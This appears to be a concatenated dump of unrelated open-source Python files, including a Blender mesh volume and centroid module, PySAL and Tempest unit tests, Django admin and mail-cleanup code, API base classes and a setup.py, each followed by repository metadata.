# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from mathutils import Vector
from ..utils import collect_modifiers
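# Summing terms in order of increasing magnitude reduces floating-point
# rounding error when large terms of opposite sign nearly cancel.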
def sortedSum(terms):
sum = 0
for t in sorted(terms, key=abs):
sum += t
return sum
def calcVolumeCentroid(mesh):
terms=[]
terms_x = []
terms_y = []
terms_z = []
num_tetras = 0
for face in mesh.polygons:
a = mesh.vertices[face.vertices[0]].co
b = mesh.vertices[face.vertices[1]].co
for i in range(2, len(face.vertices)):
c = mesh.vertices[face.vertices[i]].co
vp = [ a.y*b.z*c.x, a.z*b.x*c.y, a.x*b.y*c.z]
vm = [-a.z*b.y*c.x, -a.x*b.z*c.y, -a.y*b.x*c.z]
terms.extend(vp)
terms.extend(vm)
terms_x.extend([a.x * vp[0], b.x * vp[0], c.x * vp[0]])
terms_y.extend([a.y * vp[0], b.y * vp[0], c.y * vp[0]])
terms_z.extend([a.z * vp[0], b.z * vp[0], c.z * vp[0]])
terms_x.extend([a.x * vp[1], b.x * vp[1], c.x * vp[1]])
terms_y.extend([a.y * vp[1], b.y * vp[1], c.y * vp[1]])
terms_z.extend([a.z * vp[1], b.z * vp[1], c.z * vp[1]])
terms_x.extend([a.x * vp[2], b.x * vp[2], c.x * vp[2]])
terms_y.extend([a.y * vp[2], b.y * vp[2], c.y * vp[2]])
terms_z.extend([a.z * vp[2], b.z * vp[2], c.z * vp[2]])
terms_x.extend([a.x * vm[0], b.x * vm[0], c.x * vm[0]])
terms_y.extend([a.y * vm[0], b.y * vm[0], c.y * vm[0]])
terms_z.extend([a.z * vm[0], b.z * vm[0], c.z * vm[0]])
terms_x.extend([a.x * vm[1], b.x * vm[1], c.x * vm[1]])
terms_y.extend([a.y * vm[1], b.y * vm[1], c.y * vm[1]])
terms_z.extend([a.z * vm[1], b.z * vm[1], c.z * vm[1]])
terms_x.extend([a.x * vm[2], b.x * vm[2], c.x * vm[2]])
terms_y.extend([a.y * vm[2], b.y * vm[2], c.y * vm[2]])
terms_z.extend([a.z * vm[2], b.z * vm[2], c.z * vm[2]])
b = c
num_tetras += 1
vol = sortedSum(terms) / 6
if vol > 0:
c_x = sortedSum(terms_x)
c_y = sortedSum(terms_y)
c_z = sortedSum(terms_z)
cent = Vector((c_x, c_y, c_z)) / (6 * 4 * vol)
else:
cent = Vector((0, 0, 0))
return vol, cent
def obj_volume_centroid(obj):
origin = Vector((0, 0, 0))
if type(obj.data) != bpy.types.Mesh:
return (0, 0), (origin, origin)
if obj.muproperties.collider and obj.muproperties.collider != 'MU_COL_NONE':
return (0, 0), (origin, origin)
#FIXME skin_mesh = obj.to_mesh(bpy.context.scene, True, 'PREVIEW')
#FIXME ext_mesh = obj.to_mesh(bpy.context.scene, True, 'RENDER')
    #FIXME horrible hack until I figure out how to get a render mode depsgraph
modifiers = collect_modifiers(obj)
depsgraph = bpy.context.evaluated_depsgraph_get()
skin_mesh = obj.evaluated_get(depsgraph).to_mesh()
skin_vol, skin_cent = calcVolumeCentroid(skin_mesh)
obj.to_mesh_clear()
for mod in modifiers:
mod.show_viewport = False
depsgraph.update()
ext_mesh = obj.evaluated_get(depsgraph).to_mesh()
ext_vol, ext_cent = calcVolumeCentroid(ext_mesh)
obj.to_mesh_clear()
for mod in modifiers:
mod.show_viewport = True
return (skin_vol, ext_vol), (skin_cent, ext_cent)
def obj_volume(obj):
return obj_volume_centroid(obj)[0]
def model_volume_centroid(obj, special={}):
origin = Vector((0, 0, 0))
base_pos = obj.matrix_world @ origin
svols = []
evols = []
scents_x = []
scents_y = []
scents_z = []
ecents_x = []
ecents_y = []
ecents_z = []
def group(g):
for o in g.objects:
recurse(o)
for c in g.children:
group(c)
def recurse(o):
if o.muproperties.modelType in special:
return
pos = o.matrix_world @ origin
v, c = obj_volume_centroid(o)
svols.append(v[0])
evols.append(v[1])
sc = c[0] + pos
ec = c[1] + pos
scents_x.append(v[0]*sc.x)
scents_y.append(v[0]*sc.y)
scents_z.append(v[0]*sc.z)
ecents_x.append(v[1]*ec.x)
ecents_y.append(v[1]*ec.y)
ecents_z.append(v[1]*ec.z)
if (o.muproperties.collider
and o.muproperties.collider != 'MU_COL_NONE'):
return
for c in o.children:
recurse(c)
if o.instance_collection and o.instance_type == 'COLLECTION':
group(o.instance_collection)
recurse(obj)
skinvol = sortedSum(svols)
extvol = sortedSum(evols)
sc_x = sortedSum(scents_x)
sc_y = sortedSum(scents_y)
sc_z = sortedSum(scents_z)
ec_x = sortedSum(ecents_x)
ec_y = sortedSum(ecents_y)
ec_z = sortedSum(ecents_z)
skincent = Vector((sc_x, sc_y, sc_z))
if skinvol != 0:
skincent /= skinvol
extcent = Vector((ec_x, ec_y, ec_z))
if extvol != 0:
extcent /= extvol
return (skinvol, extvol), (skincent - base_pos, extcent - base_pos)
def model_volume(obj, special={}):
return model_volume_centroid(obj, special)[0]
def find_com(objects):
origin = Vector((0, 0, 0))
base_pos = objects[0].matrix_world @ origin
weighted_x = [None] * len(objects)
weighted_y = [None] * len(objects)
weighted_z = [None] * len(objects)
vols = [None] * len(objects)
for i, obj in enumerate(objects):
pos = obj.matrix_world @ origin - base_pos
if obj.instance_collection and obj.instance_type == 'COLLECTION':
(svol, evol), (scent, escent) = model_volume_centroid(obj)
elif obj.data and type(obj.data) == bpy.types.Mesh:
(svol, evol), (scent, escent) = obj_volume_centroid(obj)
else:
svol = 0
scent = origin
wpos = (pos + scent) * svol
weighted_x[i] = wpos.x
weighted_y[i] = wpos.y
weighted_z[i] = wpos.z
vols[i] = svol
vol = sortedSum(vols)
x = sortedSum(weighted_x)
y = sortedSum(weighted_y)
z = sortedSum(weighted_z)
pos = Vector((x, y, z))
if vol != 0:
pos /= vol
return pos + base_pos
|
taniwha-qf/io_object_mu
|
export_mu/volume.py
|
Python
|
gpl-2.0
| 6,925
|
import unittest
import pysal
import scipy
import numpy as np
from pysal.spreg.ml_lag import ML_Lag
from pysal.spreg import utils
from pysal.common import RTOL
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Max Likelihood requires SciPy version 11 or newer.")
class TestMLError(unittest.TestCase):
def setUp(self):
db = pysal.open(pysal.examples.get_path("baltim.dbf"),'r')
self.ds_name = "baltim.dbf"
self.y_name = "PRICE"
self.y = np.array(db.by_col(self.y_name)).T
self.y.shape = (len(self.y),1)
self.x_names = ["NROOM","AGE","SQFT"]
self.x = np.array([db.by_col(var) for var in self.x_names]).T
ww = pysal.open(pysal.examples.get_path("baltim_q.gal"))
self.w = ww.read()
ww.close()
self.w_name = "baltim_q.gal"
self.w.transform = 'r'
def test_model1(self):
reg = ML_Lag(self.y,self.x,w=self.w,name_y=self.y_name,name_x=self.x_names,\
name_w=self.w_name,name_ds=self.ds_name)
betas = np.array([[-6.04040164],
[ 3.48995114],
[-0.20103955],
[ 0.65462382],
[ 0.62351143]])
np.testing.assert_allclose(reg.betas,betas,RTOL)
u = np.array([ 47.51218398])
np.testing.assert_allclose(reg.u[0],u,RTOL)
predy = np.array([-0.51218398])
np.testing.assert_allclose(reg.predy[0],predy,RTOL)
n = 211
np.testing.assert_allclose(reg.n,n,RTOL)
k = 5
np.testing.assert_allclose(reg.k,k,RTOL)
y = np.array([ 47.])
np.testing.assert_allclose(reg.y[0],y,RTOL)
x = np.array([ 1. , 4. , 148. , 11.25])
np.testing.assert_allclose(reg.x[0],x,RTOL)
e = np.array([ 41.99251608])
np.testing.assert_allclose(reg.e_pred[0],e,RTOL)
my = 44.307180094786695
np.testing.assert_allclose(reg.mean_y,my)
sy = 23.606076835380495
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([ 28.57288755, 1.42341656, 0.00288068, 0.02956392, 0.00332139])
np.testing.assert_allclose(reg.vm.diagonal(),vm,RTOL)
sig2 = 216.27525647243797
np.testing.assert_allclose(reg.sig2,sig2,RTOL)
pr2 = 0.6133020721559487
np.testing.assert_allclose(reg.pr2,pr2)
std_err = np.array([ 5.34536131, 1.19307022, 0.05367198, 0.17194162, 0.05763147])
np.testing.assert_allclose(reg.std_err,std_err,RTOL)
logll = -875.92771143484833
np.testing.assert_allclose(reg.logll,logll,RTOL)
aic = 1761.8554228696967
np.testing.assert_allclose(reg.aic,aic,RTOL)
schwarz = 1778.614713537077
np.testing.assert_allclose(reg.schwarz,schwarz,RTOL)
if __name__ == '__main__':
unittest.main()
|
schmidtc/pysal
|
pysal/spreg/tests/test_ml_lag.py
|
Python
|
bsd-3-clause
| 2,788
|
"""
Base utilities to build API operation managers and objects on top of.
"""
class Manager(object):
"""
Managers interact with a particular type of resource and provide CRUD
operations for them.
"""
resource_class = None
def __init__(self, api):
self.api = api
def _list(self, url):
resp, body = self.api.client.get(url)
return [self.resource_class(self, res) for res in body]
def _get(self, url):
resp, body = self.api.client.get(url)
return self.resource_class(self, body)
def _create(self, url, body):
resp, body = self.api.client.post(url, body=body)
return self.resource_class(self, body)
def _delete(self, url):
resp, body = self.api.client.delete(url)
def _update(self, url, body):
resp, body = self.api.client.put(url, body=body)
class Resource(object):
"""
    A Resource represents a particular instance of an object returned by the API.
It's pretty much just a bag for attributes.
"""
def __init__(self, manager, info):
self.manager = manager
self._info = info
self._add_details(info)
def _add_details(self, info):
for (k, v) in info.iteritems():
setattr(self, k, v)
def __getattr__(self, k):
self.get()
if k not in self.__dict__:
raise AttributeError(k)
else:
return self.__dict__[k]
def __repr__(self):
reprkeys = sorted(k for k in self.__dict__.keys() if k[0] != '_' and k != 'manager')
info = ", ".join("%s=%s" % (k, getattr(self, k)) for k in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
# Avoid triggering __getattr__ recursively.
new = self.manager.get(self.__dict__['id'])
self._add_details(new._info)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if hasattr(self, 'id') and hasattr(other, 'id'):
return self.id == other.id
return self._info == other._info
def getid(obj):
"""
Abstracts the common pattern of allowing both an object or an object's ID
(integer) as a parameter when dealing with relationships.
"""
try:
return obj.id
except AttributeError:
return int(obj)
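# A minimal usage sketch (hypothetical resource type and URLs; Manager and
# Resource are intended to be subclassed per API resource):
#
# class Story(Resource):
#     pass
#
# class StoryManager(Manager):
#     resource_class = Story
#
#     def list(self):
#         return self._list('/stories/')
#
#     def get(self, story):
#         return self._get('/stories/%s/' % getid(story))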
|
jacobian-archive/python-storymarket
|
storymarket/base.py
|
Python
|
bsd-3-clause
| 2,426
|
from django.contrib import admin
from django_tablib.admin import TablibAdmin
from django import forms
from gigs.gig_registry import models
class AutofillUUIDForm(forms.ModelForm):
class Meta:
model = None
def __init__(self, *args, **kwargs):
# TODO(shauno): This method stops working once we have multiple
# users adding gigs at the same time. Two users pull up the same
# form and they will get the same UUID, and the first one to
# submit gets to use it, the second one will not be able to submit
# their form because the UUID is not unique. Might be better to
# generate on save, but this is an implicit action, and may not
# be intuitive for the user
#
print args
print kwargs
if not kwargs.get('instance', None):
if not kwargs.get('initial', None):
kwargs['initial'] = {}
kwargs['initial'].update({'uuid': self.Meta.model.objects.get_next_UUID()})
super(AutofillUUIDForm, self).__init__(*args, **kwargs)
class MusicianAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Musician
class MusicianAdmin(admin.ModelAdmin):
form = MusicianAutofillUUIDForm
class MusicianInline(admin.TabularInline):
form = MusicianAutofillUUIDForm
fields = ['musician', 'started', 'finished', 'date_of_birth', 'instrument',]
model = models.Musician
class MembershipInline(admin.TabularInline):
model = models.BandMembership
verbose_name = "Band Member"
verbose_name_plural = "Band Members"
fields = ['musician', 'started', 'finished']
extra = 3
class BandAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Band
class BandAdmin(admin.ModelAdmin):
form = BandAutofillUUIDForm
inlines = [MembershipInline]
list_display = ['name']
search_fields = ['name', 'comment']
class BandInline(admin.TabularInline):
model = models.Gig.bands.through
def formfield_for_foreignkey(self, db_field, request, **kwargs):
# limit the choice of stages to stages listed
# for the gig's venue
if db_field.name == "stage":
try:
gig = request.gig
kwargs["queryset"] = models.Stage.objects.filter(venue__exact=gig.venue)
except AttributeError:
pass
return super(BandInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_venue_id(gig):
return gig.venue.id
class GigAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Gig
class GigAdmin(TablibAdmin):
form = GigAutofillUUIDForm
fieldsets = [
(None, {'fields': ['name', 'venue', 'cost', 'gig_type', 'source']}),
('Dates', {'fields': ['start', 'finish']}),
('Metadata', {'fields': ['uuid','comment']}),
]
formats = ['csv', 'xls']
headers = {
'name': 'name',
'start': 'start',
'finish': 'finish',
'cost': 'cost',
'comment': 'comment',
'venue.id': get_venue_id,
}
inlines = (BandInline,)
list_filter = ('venue', 'bands',)
search_fields = ['name', 'venue__name', 'comment']
def get_form(self, request, obj=None, **kwargs):
# add the gig object to the request so that it
# can be passed down to the inlines. The inlines
        # use the object to limit the choices in drop-
# downs to relevant choices
request.gig = obj
return super(GigAdmin, self).get_form(request, obj, **kwargs)
def get_gig_type(obj):
return "%s" % (obj.gig_type.name)
get_gig_type.short_description = 'Gig type'
get_gig_type.admin_order_field = 'gig_type__name'
def get_venue_name(obj):
return "%s" % (obj.venue.name)
get_venue_name.short_description = 'Venue'
get_venue_name.admin_order_field = 'venue__name'
def get_gig(obj):
return obj
get_gig.short_description = 'Gig'
get_gig.admin_order_field = 'id'
list_display = [get_gig, get_venue_name, 'name', 'start', 'cost', get_gig_type]
ordering = ['-id']
def get_location_id(venue):
return venue.location.id
class VenueAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Venue
class VenueAdmin(TablibAdmin):
form = VenueAutofillUUIDForm
list_display = ['name', 'location', 'established', 'venue_type', 'status']
list_filter = ('venue_type', 'status', 'location__suburb')
search_fields = ['name', 'venue_type', 'location__suburb', 'comment']
formats = ['csv', 'xls']
headers={
'name': 'name',
'uid': 'uid',
'location.id': get_location_id,
'established': 'established',
'venue_type':'venue_type',
'status':'status',
'status_notes':'status_notes',
'comment':'comment',
}
class LocationAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Location
class LocationAdmin(TablibAdmin):
form = LocationAutofillUUIDForm
list_display = ['street_address', 'building_name', 'suburb', 'state', 'post_code', 'lat', 'lon']
list_filter = ('suburb', 'post_code', 'state', 'building_name')
fieldsets = [
('Address',
{'fields':
[
'building_name',
'street_address',
'suburb',
'state',
'post_code',
'country',
]
}
),
('Co-ordinates',
{'fields':
[
'lat',
'lon',
]
}
),
('Metadata',
{'fields':
[
'uuid',
'comment',
]
}
)
]
formats = ['csv', 'xls']
search_fields = ['street_address', 'suburb', 'post_code', 'state', 'building_name', 'comment']
admin.site.register(models.Band, BandAdmin)
admin.site.register(models.Musician, MusicianAdmin)
admin.site.register(models.Owner)
admin.site.register(models.Venue, VenueAdmin)
admin.site.register(models.Location, LocationAdmin)
admin.site.register(models.Genre)
admin.site.register(models.Gig, GigAdmin)
admin.site.register(models.GigType)
admin.site.register(models.Source)
admin.site.register(models.SourceType)
admin.site.register(models.BandMembership)
admin.site.register(models.Stage)
|
shaunokeefe/gigs
|
gigs/gig_registry/admin.py
|
Python
|
bsd-3-clause
| 6,616
|
#!/usr/bin/env python
# encoding: utf-8
# ----------------------------------------------------------------------------
import datetime
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from django_yubin.management.commands import create_handler
from django_yubin.models import Message
class Command(BaseCommand):
help = 'Delete the mails created before -d days (default 90)'
option_list = BaseCommand.option_list + (
make_option('-d', '--days', type='int', default=90,
help="Cleanup mails older than this many days, defaults to 90."),
)
def handle(self, verbosity, days, **options):
# Delete mails and their related logs and queued created before X days
logger = logging.getLogger('django_yubin')
handler = create_handler(verbosity)
logger.addHandler(handler)
today = datetime.date.today()
cutoff_date = today - datetime.timedelta(days)
count = Message.objects.filter(date_created__lt=cutoff_date).count()
Message.objects.filter(date_created__lt=cutoff_date).delete()
logger.warning("Deleted %s mails created before %s " %
(count, cutoff_date))
|
sergei-maertens/django-yubin
|
django_yubin/management/commands/cleanup_mail.py
|
Python
|
apache-2.0
| 1,233
|
print "How old are you?"
age = int(raw_input())
if age >= 21:
print "Yay, you can drink legally!"
print "You are", age, "years old."
|
jordantdavis/CourseProblemSolvingWithComputers
|
InClassExamples/DrinkingAge.py
|
Python
|
mit
| 142
|
# Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
from tempest.api.compute import base
from tempest import test
class TenantUsagesTestJSON(base.BaseV2ComputeAdminTest):
@classmethod
def setup_clients(cls):
super(TenantUsagesTestJSON, cls).setup_clients()
cls.adm_client = cls.os_adm.tenant_usages_client
cls.client = cls.os.tenant_usages_client
@classmethod
def resource_setup(cls):
super(TenantUsagesTestJSON, cls).resource_setup()
cls.tenant_id = cls.client.tenant_id
# Create a server in the demo tenant
cls.create_test_server(wait_until='ACTIVE')
time.sleep(2)
now = datetime.datetime.now()
cls.start = cls._parse_strtime(now - datetime.timedelta(days=1))
cls.end = cls._parse_strtime(now + datetime.timedelta(days=1))
@classmethod
def _parse_strtime(cls, at):
# Returns formatted datetime
return at.strftime('%Y-%m-%dT%H:%M:%S.%f')
@test.idempotent_id('062c8ae9-9912-4249-8b51-e38d664e926e')
def test_list_usage_all_tenants(self):
# Get usage for all tenants
tenant_usage = self.adm_client.list_tenant_usages(
start=self.start, end=self.end, detailed="1")['tenant_usages'][0]
self.assertEqual(len(tenant_usage), 8)
@test.idempotent_id('94135049-a4c5-4934-ad39-08fa7da4f22e')
def test_get_usage_tenant(self):
# Get usage for a specific tenant
tenant_usage = self.adm_client.show_tenant_usage(
self.tenant_id, start=self.start, end=self.end)['tenant_usage']
self.assertEqual(len(tenant_usage), 8)
@test.idempotent_id('9d00a412-b40e-4fd9-8eba-97b496316116')
def test_get_usage_tenant_with_non_admin_user(self):
# Get usage for a specific tenant with non admin user
tenant_usage = self.client.show_tenant_usage(
self.tenant_id, start=self.start, end=self.end)['tenant_usage']
self.assertEqual(len(tenant_usage), 8)
|
pczerkas/tempest
|
tempest/api/compute/admin/test_simple_tenant_usage.py
|
Python
|
apache-2.0
| 2,598
|
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
import mpf
# Test
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
# README
readme = ""
with open("README.md", "r") as f:
readme = f.read()
# Packages
packages = [
"mpf"
]
# Requirements
def strip_comments(l):
return l.split("#", 1)[0].strip()
def reqs(*f):
return list(filter(None, [strip_comments(l) for l in open(os.path.join(os.getcwd(), *f)).readlines()]))
requirements = reqs("requirements.txt")
test_requirements = reqs("requirements-dev.txt")
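# Drop the first entry of requirements-dev.txt below; it is assumed to be an
# include line such as "-r requirements.txt".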
test_requirements = requirements + test_requirements[1:]
setup(
name="mpf",
version=mpf.__version__,
description="",
long_description=readme,
author="Vayel",
author_email="vincent.lefoulon@free.fr",
url="https://github.com/Vayel/MPF",
packages=packages,
package_dir={"mpf": "mpf"},
include_package_data=True,
install_requires=requirements,
license="MIT",
zip_safe=False,
keywords="mpf",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4"
],
cmdclass={"test": PyTest},
tests_require=test_requirements
)
|
tartopum/MPF
|
setup.py
|
Python
|
mit
| 1,662
|